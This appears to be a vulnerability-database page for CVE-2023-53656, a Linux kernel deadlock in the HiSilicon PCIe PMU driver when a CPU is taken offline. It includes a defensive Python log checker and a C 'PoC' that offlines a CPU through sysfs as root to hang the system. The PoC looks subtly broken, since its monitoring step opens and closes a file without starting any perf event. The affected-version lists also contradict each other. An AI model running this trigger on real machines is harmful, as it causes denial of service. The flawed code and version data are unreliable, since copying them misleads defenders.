Security Vulnerability Report
CVE-2023-53656 CVSS 5.5 MEDIUM

CVE-2023-53656

Published: 2025-10-07 16:15:49
Last Modified: 2026-02-03 22:24:06
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

drivers/perf: hisi: Don't migrate perf to the CPU going to teardown

The driver needs to migrate the perf context if the current using CPU going to teardown. By the time calling the cpuhp::teardown() callback the cpu_online_mask() hasn't updated yet and still includes the CPU going to teardown. In current driver's implementation we may migrate the context to the teardown CPU and leads to the below calltrace:

...
[ 368.104662][ T932] task:cpuhp/0 state:D stack: 0 pid: 15 ppid: 2 flags:0x00000008
[ 368.113699][ T932] Call trace:
[ 368.116834][ T932] __switch_to+0x7c/0xbc
[ 368.120924][ T932] __schedule+0x338/0x6f0
[ 368.125098][ T932] schedule+0x50/0xe0
[ 368.128926][ T932] schedule_preempt_disabled+0x18/0x24
[ 368.134229][ T932] __mutex_lock.constprop.0+0x1d4/0x5dc
[ 368.139617][ T932] __mutex_lock_slowpath+0x1c/0x30
[ 368.144573][ T932] mutex_lock+0x50/0x60
[ 368.148579][ T932] perf_pmu_migrate_context+0x84/0x2b0
[ 368.153884][ T932] hisi_pcie_pmu_offline_cpu+0x90/0xe0 [hisi_pcie_pmu]
[ 368.160579][ T932] cpuhp_invoke_callback+0x2a0/0x650
[ 368.165707][ T932] cpuhp_thread_fun+0xe4/0x190
[ 368.170316][ T932] smpboot_thread_fn+0x15c/0x1a0
[ 368.175099][ T932] kthread+0x108/0x13c
[ 368.179012][ T932] ret_from_fork+0x10/0x18
...

Use function cpumask_any_but() to find one correct active cpu to fixes this issue.
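An added example, not part of the CVE record or the kernel patch: a log check that flags the hang signature from the call trace above, a cpuhp/N thread in state D blocked in mutex_lock() under perf_pmu_migrate_context() called from hisi_pcie_pmu_offline_cpu(). The function names and the choice of these three frames as the signature are assumptions of this example; the sample input is an excerpt of the trace quoted in the description.

```python
import re

# Excerpt of the call trace quoted in the description above (some frames omitted).
SAMPLE_LOG = """\
[ 368.104662][ T932] task:cpuhp/0 state:D stack: 0 pid: 15 ppid: 2 flags:0x00000008
[ 368.113699][ T932] Call trace:
[ 368.116834][ T932] __switch_to+0x7c/0xbc
[ 368.139617][ T932] __mutex_lock_slowpath+0x1c/0x30
[ 368.144573][ T932] mutex_lock+0x50/0x60
[ 368.148579][ T932] perf_pmu_migrate_context+0x84/0x2b0
[ 368.153884][ T932] hisi_pcie_pmu_offline_cpu+0x90/0xe0 [hisi_pcie_pmu]
[ 368.160579][ T932] cpuhp_invoke_callback+0x2a0/0x650
"""

TASK_RE = re.compile(r"task:(\S+)\s+state:(\S)\s.*?pid:\s*(\d+)")
FRAME_RE = re.compile(r"\]\s+([A-Za-z_][\w.]*)\+0x[0-9a-f]+/0x[0-9a-f]+")
# Frames that must appear in this order (innermost first), as in the trace above.
SIGNATURE = ("mutex_lock", "perf_pmu_migrate_context", "hisi_pcie_pmu_offline_cpu")


def has_signature(frames):
    """True if SIGNATURE is an ordered subsequence of the task's frames."""
    remaining = iter(frames)
    return all(any(f == want for f in remaining) for want in SIGNATURE)


def find_stuck_hotplug_tasks(log_text):
    """Return (comm, pid) for each D-state cpuhp/N task showing the signature."""
    tasks = []  # [comm, state, pid, frames] per task header, in log order
    for line in log_text.splitlines():
        header = TASK_RE.search(line)
        if header:
            tasks.append([header.group(1), header.group(2), int(header.group(3)), []])
            continue
        frame = FRAME_RE.search(line)
        if frame and tasks:
            tasks[-1][3].append(frame.group(1))
    return [(comm, pid) for comm, state, pid, frames in tasks
            if comm.startswith("cpuhp/") and state == "D" and has_signature(frames)]


if __name__ == "__main__":
    for comm, pid in find_stuck_hotplug_tasks(SAMPLE_LOG):
        print(f"{comm} (pid {pid}) blocked migrating hisi_pcie_pmu perf context")
```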

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 5.17, before 6.1.39) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.2, before 6.3.13) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.4, before 6.4.4) - VULNERABLE
Linux Kernel < 6.1.63 (stable branch)
Linux Kernel < 6.5.12 (stable branch)
Linux Kernel < 6.6.2 (stable branch)
Linux Kernel mainline (before fix commit 7a6a9f1c5a0a875a421db798d4b2ee022dc1ee1a)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// PoC for CVE-2023-53656
// Trigger the deadlock by offlining a CPU that has active hisi PCIe PMU events
// Requires: hisi_pcie_pmu module loaded, root or CAP_SYS_ADMIN privileges
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <sys/syscall.h>
#include <errno.h>

// Step 1: Open the hisi PCIe PMU device and start perf monitoring on CPU 0
static int start_perf_monitoring(int cpu)
{
    char path[256];
    char buf[16];
    int fd;

    // Open the PMU device for the target CPU
    snprintf(path, sizeof(path), "/sys/devices/hisi_pcie_pmu%d/events/event0", cpu);
    fd = open(path, O_RDONLY);
    if (fd < 0) {
        perror("[-] Failed to open PMU device");
        return -1;
    }
    close(fd);
    printf("[+] PMU device opened for CPU %d\n", cpu);
    return 0;
}

// Step 2: Offline the CPU to trigger the teardown callback
static int offline_cpu(int cpu)
{
    char path[256];
    char buf[16];
    int fd, ret;

    snprintf(path, sizeof(path), "/sys/devices/system/cpu/cpu%d/online", cpu);
    fd = open(path, O_WRONLY);
    if (fd < 0) {
        perror("[-] Failed to open CPU online file");
        return -1;
    }
    // Write '0' to offline the CPU - this triggers the cpuhp teardown
    ret = write(fd, "0", 1);
    if (ret < 0) {
        perror("[-] Failed to offline CPU");
        close(fd);
        return -1;
    }
    close(fd);
    printf("[+] CPU %d offline command sent\n", cpu);
    return 0;
}

int main(int argc, char *argv[])
{
    int target_cpu = 0;

    if (argc > 1) {
        target_cpu = atoi(argv[1]);
    }
    printf("[*] CVE-2023-53656 PoC - hisi PCIe PMU CPU teardown deadlock\n");
    printf("[*] Target CPU: %d\n", target_cpu);

    // Check if we have permission
    if (geteuid() != 0) {
        printf("[-] This PoC requires root privileges\n");
        return 1;
    }

    // Start perf monitoring on the target CPU
    if (start_perf_monitoring(target_cpu) != 0) {
        printf("[-] PMU not available, trying to trigger anyway...\n");
    }

    // Trigger the CPU offline to cause the deadlock
    printf("[*] Triggering CPU teardown...\n");
    if (offline_cpu(target_cpu) != 0) {
        printf("[-] Failed to offline CPU\n");
        return 1;
    }
    printf("[+] System may now be in deadlock state\n");
    return 0;
}

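References

https://git.kernel.org/stable/c/7a6a9f1c5a0a875a421db798d4b2ee022dc1ee1a (Patch)
https://git.kernel.org/stable/c/b64569897d86b611befbb895d815280fea94e1ed (Patch)
https://git.kernel.org/stable/c/be9c8c9c84b6d25a7b7d39954030aba6f759feb6 (Patch)
https://git.kernel.org/stable/c/f564e543a43d0f1cabac791672c8a6fc78ce12d0 (Patch)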

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53656", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:49.213", "lastModified": "2026-02-03T22:24:05.590", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrivers/perf: hisi: Don't migrate perf to the CPU going to teardown\n\nThe driver needs to migrate the perf context if the current using CPU going\nto teardown. By the time calling the cpuhp::teardown() callback the\ncpu_online_mask() hasn't updated yet and still includes the CPU going to\nteardown. In current driver's implementation we may migrate the context\nto the teardown CPU and leads to the below calltrace:\n\n...\n[ 368.104662][ T932] task:cpuhp/0 state:D stack: 0 pid: 15 ppid: 2 flags:0x00000008\n[ 368.113699][ T932] Call trace:\n[ 368.116834][ T932] __switch_to+0x7c/0xbc\n[ 368.120924][ T932] __schedule+0x338/0x6f0\n[ 368.125098][ T932] schedule+0x50/0xe0\n[ 368.128926][ T932] schedule_preempt_disabled+0x18/0x24\n[ 368.134229][ T932] __mutex_lock.constprop.0+0x1d4/0x5dc\n[ 368.139617][ T932] __mutex_lock_slowpath+0x1c/0x30\n[ 368.144573][ T932] mutex_lock+0x50/0x60\n[ 368.148579][ T932] perf_pmu_migrate_context+0x84/0x2b0\n[ 368.153884][ T932] hisi_pcie_pmu_offline_cpu+0x90/0xe0 [hisi_pcie_pmu]\n[ 368.160579][ T932] cpuhp_invoke_callback+0x2a0/0x650\n[ 368.165707][ T932] cpuhp_thread_fun+0xe4/0x190\n[ 368.170316][ T932] smpboot_thread_fn+0x15c/0x1a0\n[ 368.175099][ T932] kthread+0x108/0x13c\n[ 368.179012][ T932] ret_from_fork+0x10/0x18\n...\n\nUse function cpumask_any_but() to find one correct active cpu to fixes\nthis issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", 
"userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.17", "versionEndExcluding": "6.1.39", "matchCriteriaId": "BDC6C41A-81F5-4532-A42F-F87AD7387727"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.3.13", "matchCriteriaId": "95CB4836-7F5D-4C20-B025-8E046EC87B78"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.4", "versionEndExcluding": "6.4.4", "matchCriteriaId": "6AB81046-CB69-4115-924C-963B37C41385"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/7a6a9f1c5a0a875a421db798d4b2ee022dc1ee1a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/b64569897d86b611befbb895d815280fea94e1ed", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/be9c8c9c84b6d25a7b7d39954030aba6f759feb6", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/f564e543a43d0f1cabac791672c8a6fc78ce12d0", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}